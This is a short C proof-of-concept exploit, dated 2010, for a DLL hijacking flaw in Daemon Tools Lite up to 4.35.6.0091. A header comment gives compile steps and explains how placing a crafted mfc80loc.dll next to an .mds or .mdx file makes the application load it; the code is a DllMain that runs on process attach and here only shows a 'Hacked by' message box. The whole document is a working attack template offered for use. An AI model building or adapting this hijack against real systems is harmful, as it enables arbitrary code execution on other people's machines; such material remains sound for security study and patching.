/*

Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit

	Found by: Christian Heinrich (cmlh)
	Exploit by: Christian Heinrich (cmlh)

	Email: christianheinrich@live.com
	Web: http://www.twitter.com/cmlh

	Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.

	Description: Daemon Tools suffers from a dll hijacking vulnerability
	that enables the attacker to execute arbitrary code on a local
	level through the .MDS and .MDX extensions.

----

Howto:

gcc -shared -o mfc80loc.dll daemontoolsexploit.c

Compile this file and rename to mfc80loc.dll

Then create an empty file named anything.msd or anything.mdx or you can create a
a legitimate image.

Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute
our code.

----

Tested on Microsoft Windows 7 / XP sp 3

Vulnerability discovered by Christian Heinrich (cmlh)


christianheinrich@live.com

27.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
}